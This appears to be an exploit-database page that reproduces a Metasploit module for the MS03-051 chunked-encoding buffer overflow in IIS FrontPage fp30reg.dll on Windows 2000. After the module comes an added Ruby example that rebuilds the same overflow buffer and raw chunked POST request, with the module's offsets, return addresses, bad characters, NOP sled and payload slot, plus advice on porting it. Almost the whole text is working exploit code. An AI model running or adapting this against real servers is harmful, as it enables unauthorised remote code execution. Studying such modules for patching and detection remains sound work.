
MS03-051 Microsoft IIS ISAPI FrontPage fp30reg.dll Chunked Overflow

25 Jul 2010 21:37:54, reported by hdm
Type: metasploit
Source: www.rapid7.com

MS03-051 Microsoft IIS ISAPI FrontPage fp30reg.dll Chunked Overflow, exploit for buffer overflow in Windows 200

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'MS03-051 Microsoft IIS ISAPI FrontPage fp30reg.dll Chunked Overflow',
      'Description'    => %q{
          This is an exploit for the chunked encoding buffer overflow
        described in MS03-051 and originally reported by Brett
        Moore. This particular module works against versions of
        Windows 2000 between SP0 and SP3. Service Pack 4 fixes the
        issue.
      },
      'Author'         => [ 'hdm' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2003-0822'],
          [ 'OSVDB', '2952'],
          [ 'BID', '9007'],
          [ 'MSB', 'MS03-051'],
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'    => 1024,
          'BadChars' => "\x00\x2b\x26\x3d\x25\x0a\x0d\x20",
          'StackAdjustment' => -3500,

        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['Windows 2000 SP0-SP3',  { 'Ret' => 0x6c38a4d0  }],   # from mfc42.dll
          ['Windows 2000 07/22/02', { 'Ret' => 0x67d44eb1  }],   # from fp30reg.dll 07/22/2002
          ['Windows 2000 10/06/99', { 'Ret' => 0x67d4665d  }],   # from fp30reg.dll 10/06/1999
        ],
      'DisclosureDate' => '2003-11-11',
      'DefaultTarget' => 0))

    register_options(
      [
        OptString.new('URL', [ true,  "The path to fp30reg.dll", "/_vti_bin/_vti_aut/fp30reg.dll" ]),
      ])
  end

  def exploit

    print_status("Creating overflow request for fp30reg.dll...")

    pat = rand_text_alphanumeric(0xdead)
    pat[128, 4] = [target.ret].pack('V')
    pat[264, 4] = [target.ret].pack('V')

    # sub eax,0xfffffeff; jmp eax
    pat[160, 7] = "\x2d\xff\xfe\xff\xff" + "\xff\xe0"

    pat[280, 512] = make_nops(512)
    pat[792, payload.encoded.length] = payload.encoded

    0.upto(15) do |i|

      if (i % 3 == 0)
        print_status("Refreshing the remote dllhost.exe process...")

        res = send_request_raw({
          'uri' => normalize_uri(datastore['URL'])
        }, -1)

        if (res and res.body =~ /specified module could not be found/)
          print_status("The server states that #{datastore['URL']} does not exist.\n")
          return
        end
      end

      print_status("Trying to exploit fp30reg.dll (request #{i} of 15)")

      res = send_request_raw({
        'uri'     => normalize_uri(datastore['URL']),
        'method'  => 'POST',
        'headers' =>
        {
          'Transfer-Encoding' => 'Chunked'
        },
        'data'    => "DEAD\r\n#{pat}\r\n0\r\n"
      }, 5)

      if (res and res.body =~ /specified module could not be found/)
        print_status("The server states that #{datastore['URL']} does not exist.\n")
        return
      end

      handler

      select(nil,nil,nil,1)
    end
  end

  def check
    print_status("Requesting the vulnerable ISAPI path...")
    r = send_request_raw({
      'uri' => normalize_uri(datastore['URL'])
    }, -1)

    if (r and r.code == 501)
      return Exploit::CheckCode::Detected
    end
    return Exploit::CheckCode::Safe
  end
end
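The following Ruby is an added worked example, not code from the module above or from Rapid7. It rebuilds the fp30reg.dll overflow buffer and the chunked POST the module sends, so the layout (the two return-address slots at 128 and 264, the seven-byte trampoline at 160, the 512-byte sled at 280 and the payload at 792) and the bad-character constraint can be inspected offline, and it mirrors the module's check and exploit-loop signals for the ISAPI path. Offsets, bad characters, chunk framing and the target return address are copied from the module; the alphanumeric filler, the placeholder INT3 payload, the example host and every function name are assumptions made for this example.

```ruby
# Added worked example (not code from the module or from Rapid7): rebuilds the
# fp30reg.dll overflow buffer and the chunked POST the module sends so the
# layout can be checked offline. Offsets, bad characters and chunk framing are
# copied from the module above; the filler, the placeholder payload and all
# function names are assumptions made for this example.

BAD_CHARS   = "\x00\x2b\x26\x3d\x25\x0a\x0d\x20".b.bytes.freeze  # module 'BadChars'
BUF_LEN     = 0xdead   # buffer length; the chunk-size line "DEAD" is this value in hex
RET_SLOTS   = [128, 264].freeze  # both slots receive the target return address
TRAMP_OFF   = 160      # sub eax,0xfffffeff ; jmp eax
NOP_OFF     = 280      # 512-byte sled
PAYLOAD_OFF = 792      # NOP_OFF + 512
SPACE       = 1024     # module 'Space'
TRAMPOLINE  = "\x2d\xff\xfe\xff\xff\xff\xe0".b

# Filler free of every BAD_CHARS byte, standing in for Rex's
# rand_text_alphanumeric. Seeded so the output is reproducible in a test.
def alnum_filler(len, rng = Random.new(1))
  chars = [*'A'..'Z', *'a'..'z', *'0'..'9']
  Array.new(len) { chars[rng.rand(chars.size)] }.join.b
end

# Offset of the first bad byte in payload, or nil when it is clean.
def bad_char_offset(payload)
  payload.b.each_byte.with_index { |b, i| return i if BAD_CHARS.include?(b) }
  nil
end

# Mirrors the module's exploit method: fill, plant the return address in both
# slots, plant the trampoline, lay the sled, then the encoded payload.
def build_overflow_buffer(ret, payload)
  raise ArgumentError, "payload exceeds #{SPACE} bytes" if payload.bytesize > SPACE
  if (off = bad_char_offset(payload))
    raise ArgumentError, format("bad char 0x%02x at payload offset %d", payload.getbyte(off), off)
  end
  pat = alnum_filler(BUF_LEN)
  RET_SLOTS.each { |slot| pat[slot, 4] = [ret].pack('V') }   # little-endian dword
  # sub eax,0xfffffeff wraps to add eax,0x101: control lands 257 bytes past eax.
  pat[TRAMP_OFF, 7] = TRAMPOLINE
  pat[NOP_OFF, 512] = "\x90".b * 512      # plain NOPs in place of make_nops
  pat[PAYLOAD_OFF, payload.bytesize] = payload.b
  pat
end

# Raw request equivalent to the module's send_request_raw call: one chunk whose
# hex size equals the buffer length, then the terminating zero-length chunk.
def chunked_post(host, path, buf)
  size = buf.bytesize.to_s(16).upcase
  head = "POST #{path} HTTP/1.1\r\nHost: #{host}\r\nTransfer-Encoding: Chunked\r\n\r\n".b
  head + size.b + "\r\n".b + buf + "\r\n0\r\n".b
end

# Combines the module's two server-side signals: check() treats HTTP 501 from
# the ISAPI path as the extension being present; the exploit loop treats
# "specified module could not be found" as it being absent.
def check_result(code, body)
  return :absent if body.to_s =~ /specified module could not be found/
  code == 501 ? :detected : :safe
end

if __FILE__ == $PROGRAM_NAME
  # Constructed stand-in payload: 16 INT3s, no real shellcode.
  buf = build_overflow_buffer(0x6c38a4d0, "\xcc".b * 16)
  req = chunked_post("192.0.2.10", "/_vti_bin/_vti_aut/fp30reg.dll", buf)
  puts "buffer: #{buf.bytesize} bytes, request: #{req.bytesize} bytes"
  puts "ret slot @128: #{buf[128, 4].unpack1('H*')}  trampoline @160: #{buf[160, 7].unpack1('H*')}"
end
```

Two details worth checking against the module when porting it: the chunk-size line is the buffer length in hex (0xdead bytes, hence "DEAD"), so changing the filler length without changing the chunk header yields a malformed chunked body; and the trampoline's `sub eax,0xfffffeff` is `add eax,0x101` under 32-bit wraparound, so it is only useful if, at the moment the return address fires, eax points 257 bytes before somewhere inside the sled. The bad-character set (NUL, `+`, `&`, `=`, `%`, CR, LF, space) is what URL/form decoding or HTTP framing would mangle, which is why the encoded payload must be scanned before use.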
